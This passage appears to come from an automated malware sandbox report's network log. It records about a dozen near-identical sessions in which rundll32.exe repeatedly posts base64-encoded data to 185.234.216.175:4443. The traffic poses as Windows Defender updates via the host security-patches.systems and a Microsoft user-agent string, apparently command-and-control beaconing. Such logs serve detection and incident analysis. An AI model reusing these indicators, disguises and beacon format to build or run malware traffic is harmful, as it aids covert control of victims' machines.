data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:51.900527954 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:51 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50065	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:52.160535097 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:53.814169884 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:53 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50070	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:54.082647085 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:55.567943096 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50073	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:55.832365990 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:57.293303013 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50078	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:57.551691055 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:59.035104036 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50084	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:59.301006079 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:00.763030052 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50089	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:01.025214911 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:02.510833979 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50094	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:02.804493904 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:04.225039005 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50095	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:04.489514112 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:05.940895081 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50096	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:06.207752943 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:07.699893951 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50097	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:08.076344013 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:09.511152029 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50099	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:09.784909964 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:14:11.236622095 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:14:10 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50100	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:14:11.504964113 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 